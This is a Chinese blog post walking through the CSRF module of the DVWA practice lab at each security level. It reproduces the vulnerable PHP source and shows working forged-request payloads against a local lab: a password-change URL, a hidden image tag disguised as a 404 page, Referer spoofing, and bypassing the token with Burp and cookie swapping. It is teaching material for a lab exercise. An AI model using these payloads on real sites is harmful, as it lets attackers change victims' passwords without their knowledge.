DVWA靶场之CSRF(跨站请求伪造)

最新推荐文章于 2024-04-06 19:47:47 发布
最新推荐文章于 2024-04-06 19:47:47 发布
阅读量1k 收藏 11
点赞数 3
分类专栏: DVWA 文章标签: csrf 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65712192/article/details/127779026
版权

目录

一、CSRF(跨站请求伪造)

low

Medium

 High

 impossible

一、CSRF(跨站请求伪造)

CSRF全称为:Cross-site request forgery,是一种常见的web攻击。在场景中,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。

指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向服务器发送请求,从而完成非法操作。

XSS的区别:CSRF是借助用户的权限完成攻击,攻击者并没有拿到权限;而XSS是直接盗取用户权限去进行破坏。

low

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

我们可以看到low难度的源代码中,并没有隐藏的token,这样我们的难度就小了很多。
然后我猜测这里的密码检测是直接将输入的进行拼接,检验password_new与password_conf是否一致。

抓个包看看吧,确实没有什么token,也没什么过滤。

 可以看到,顶部URL就是修改密码的链接。我们打开另一个页面,输入URL,就跳转到了密码修改成功的界面。

http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#当然我们也可以伪造一个链接,生成短链接,加以修饰。点短链接也是同一效果。

也可以利用html构造一个攻击界面,看似失败,实则成功。

​

<img src="http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#"border=“0” style=“display:none;”/>

<h1>404</h1>

<h2>file not found.</h2>
​

 

Medium

查看代码

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Checks to see where the request came from
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
        // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
            $pass_new = md5( $pass_new );

            // Update the database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Feedback for the user
            echo "<pre>Password Changed.</pre>";
        }
        else {
            // Issue with passwords matching
            echo "<pre>Passwords did not match.</pre>";
        }
    }
    else {
        // Didn't come from a trusted source
        echo "<pre>That request didn't look correct.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

Middle类型的代码在Low级别的基础上,加上了对用户请求头的中的Referer字段进行验证.

即用户的请求头中的Referer字段必须包含了服务器的名字。

Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。

if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false )

在php语言中int eregi(string pattern, string string),译为
检查string函数中是否含有pattern,如果有返回True,反之False。 

我们访问low级别的网址,看看什么情况。结果报错。

http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#

我们就看看正确的什么样的,有Referer字段。

 在次访问报错的网址,并抓包。发现确实没有Referer字段。所以不能修改成功。

 我们可以自己加一个Referer字段,然后值只要设置成包含了主机头127.0.0.1就行了,修改成功。

 也可以把html文件复制到dvwa的根目录下


<img src="http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#"border=“0” style=“display:none;”/>

<h1>404</h1>

<h2>file not found.</h2>

打开127.0.0.1/dvwa/hhh.html   一访问密码就变成了123456  

登录一下看看

 High

查看源码

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>

 可以发现High加入了token机制,用户每次访问改密页面时,服务器都会返回一个随机的token,当浏览器向服务器发起请求时,需要提交token参数,而服务器在收到请求时,会优先检查token,只有token正确,才会处理客户端的请求。

我们可以用bp抓包抓取token值。

 把数据包发送到Repeater.

 Send跑一下,成功修改密码。

当我们在次改密码时,发现进不去 报错,显示302(临时重定向)可以简单的理解为该资源原本确实存在,但已经被临时改变了位置。

这时我们可以用1.BP抓Cookie  2.BP的插件

1.BP抓Cookie

抓取low级别的Cookie值为security=low; PHPSESSID=ghdde3qul6u4m6edhmlf57hq12

然后用low级别的Cooike复制到high级别的Cookie

 我们发现网页low级别和high级别的Cookie只有security的参数不同。用low级别的Cookie替换high的Cookie也能成功修改密码。

2.BP的插件

我们还可以用bp的插件CSRF Token Tracker绕过token验证。

在CSRF Token Tracker写入主机名,token字段,值。

Send跑一下,虽然token的值没有发生变化但是看CSRF Token Tracker里面的token值已经随机生成了,发现密码修改成功。

我们这时在火狐上测试自己的dvwa,改密码,同时在其他浏览器上也是生效的

 impossible

发现让我们输入原密码 这就难搞咯!

 看看源码

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_curr = $_GET[ 'password_current' ];
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Sanitise current password input
    $pass_curr = stripslashes( $pass_curr );
    $pass_curr = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass_curr = md5( $pass_curr );

    // Check that the current password is correct
    $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
    $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
    $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
    $data->execute();

    // Do both new passwords match and does the current password match the user?
    if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) {
        // It does!
        $pass_new = stripslashes( $pass_new );
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update database with new password
        $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
        $data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
        $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
        $data->execute();

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match or current password incorrect.</pre>";
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

 加入了PDO预编译语句防止SQL注入,防止CSRF不仅用了token,还要求用户输入原密码,这样在不知道原密码的情况下就无法构造参数。因此,目前还无法破解。

橙子学不会.
关注
  • 3
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DVWA靶场练习三—CSRF
afei001
05-04 690
CSRF介绍 CSRF跨站请求伪造(Cross-Site Request Forgery)是一种攻击,它迫使最终用户在当前已通过身份验证的Web应用程序上执行不需要的操作。CSRF攻击专门针对状态更改请求而不是数据窃取,因为攻击者无法看到对伪造请求的响应。在社交工程的一点帮助下(例如通过电子邮件或聊天发送链接),攻击者可能会欺骗Web应用程序的用户执行攻击者选择的操作。如果...
2019-3-13 dvwa学习(12)--Cross Site Request Forgery (CSRF),跨站请求伪造
weixin_42555985的博客
03-13 569
Cross Site Request Forgery (CSRF),跨站请求伪造,它会让用户在当前经过身份验证的Web应用程序上执行攻击者预订的操作。CSRF攻击专门针对状态更改请求,而不是数据盗窃,因为攻击者无法看到对伪造请求的响应。恶意代码会通过电子邮件或伪装网站,甚至直接链接形式发送给用户,诱骗Web应用程序的用户执行攻击者设定的操作。 如果受害者是普通用户,成功的CSRF攻击会迫使用户执...
DVWA —— Cross Site Request Forgery (CSRF) 跨站请求伪造
YouTheFreedom的博客
05-22 608
跨站请求伪造(英语:Cross-siterequest forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF ,是一种挟制用户在当前已登录的 Web 应用程序上执行非本意的操作的攻击方法。因为是模仿受害者点击该连接实现密码修改,所以需要点击该链接提交表单时也需要受害者在网站上处于登陆状态,而且登陆后浏览器中保存了验证身份的 cookie 等信息,所以登陆网站的浏览器也要与之前相同,否则身份验证不成功,就无法成功修改用户密码了。
程序猿必读-防范CSRF跨站请求伪造
weixin_34232617的博客
02-27 236
CSRF(Cross-site request forgery,中文为跨站请求伪造)是一种利用网站可信用户的权限去执行未授权的命令的一种恶意攻击。通过伪装可信用户的请求来利用信任该用户的网站,这种攻击方式虽然不是很流行,但是却难以防范,其危害也不比其他安全漏洞小。 本文将简要介绍CSRF产生的原因以及利用方式,然后对如何避免这种攻击方式...
DVWA——跨站请求伪造
最新发布
m0_74426634的博客
04-06 728
CSRF概述:我们首先来了解一下什么是跨站请求伪造CSRF)?跨站请求伪造是一种挟制终端用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。攻击者只要借助少许的社会工程诡计,例如通过电子邮件或者是聊天软件发送的链接,攻击者就能迫使一个Web应用程序的用户去执行攻击者选择的操作。
DVWA---跨站请求伪造CSRF
qq_74806534的博客
01-13 295
CSRF (Cross-site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户请求受信任的网站。简单的说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己以前认证过的站点并运行一些操作(如发邮件,发消息,甚至财产操作(如转账和购买商品))。
DVWA靶场搭建与使用
09-02
5. **其他漏洞**:如权限绕过、CSRF跨站请求伪造)、信息泄露等。 在每个安全等级下,都有相应的提示和解决方案,通过解决这些问题,你可以深入了解Web应用安全,并提高你的安全意识和技能。 **六、学习资源与...
DVWA靶场源码分享
12-11
3. 跨站请求伪造CSRF):攻击者诱使用户在他们不知情的情况下执行恶意操作,如更改密码或进行转账。 4. 文件包含漏洞:允许攻击者通过指定动态文件路径,加载并执行服务器上的任意文件。 5. 功能弱化的认证和会话...
dvwa靶场训练.rar
03-17
DVWA分为多个安全级别,包括"Low"、"Medium"、"High"和"Impossible",每个级别下都有不同的漏洞类型,如SQL注入、XSS(跨站脚本)、CSRF跨站请求伪造)等。这些漏洞在现实世界中非常常见,掌握它们的识别和利用...
DVWA(练手靶场).zip
09-01
6. **跨站请求伪造(CSRF)**:DVWACSRF漏洞展示了如何在用户不知情的情况下,利用他们的浏览器发起恶意请求。防止CSRF的方法包括使用CSRF令牌、限制敏感操作的HTTP方法(如仅限POST),以及检查请求的来源。 7. **...
PHP、Apache环境中部署DVWA(综合靶场
01-08
DVWA(Damn Vulnerable Web Application)是一款专门为安全研究人员和Web开发者设计的开源靶场工具,它包含了多种常见的Web应用漏洞,如密码爆破、SQL注入、文件上传、文件包含、跨站脚本(XSS)和跨站请求伪造...
DVWA通过教程之跨站请求伪造CSRF
→_→
09-16 339
CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。 更多原理请参考:浅谈“跨站请求伪造CSRF)”-干货满满 测试CSRF,要求能够不通过该页面即可修改用户登录密
DVWACSRF漏洞复现
weixin_43263451的博客
07-19 1032
CSRF(跨站请求伪造)定义跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。 基本原理 从上图可以看出,要完成一次CSRF攻击,受害者必须依次完成两个步骤:   ...
SpringSecurity自定义登录页面跳转时访问页面302(坑位总结)
m0_46435741的博客
10-11 5832
form表单提交和成功页面跳转必须是post请求 自定义的login.html中,form表单的method必须是post <form action="/login" method="post"> 用户名:<input type="text" name="username"/></br> 密码:<input type="password" name="password"/> <input type="submit" value="
DVWACSRF(跨站请求伪造攻击)
热门推荐
谢公子的博客
10-01 1万+
目录 Low Middle High Impossible Low 源代码: &lt;?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; ...
BurpSuite进阶篇--自动识别Token
tangshuangsss的专栏
11-23 2303
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介BurpSutie心目中最强web安全工具,没有之一,本篇文章介绍如何在目标网站配置token值...
Session、Token验证的区别以及CSRF攻击
近光的博客
06-06 7972
Session是什么 session意为“会话”。我们都知道HTTP是无状态的协议,但有时我们需要保存状态来进行后面的操作,比如某个电商网站的购物车功能(在不登录的情况下,也就是不使用数据库),如果不使用session,那么每次添加物品到购物篮后都不会保存,结果就是刷新一下购物篮就会变成空的。所以我们需要这个session来保存一定的状态。当用户打开某个网页的时候,就发生了一次会话,也就是...
WEB三大攻击之—CSRF攻击与防护
Rome was not built in one day
07-17 1984
转自:https://www.daguanren.cc/post/csrf-introduction.html CSRF 背景与介绍 CSRF定义: 跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非...
dvwa跨站请求伪造 (csrf)
09-13
跨站请求伪造CSRF)是一种攻击方式,利用用户已经通过身份验证的会话执行非预期的操作。 在DVWA中,CSRF可以被用作一种漏洞进行攻击。攻击者可以通过在受害者浏览器中注入恶意代码或链接,来诱使用户执行某些不...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值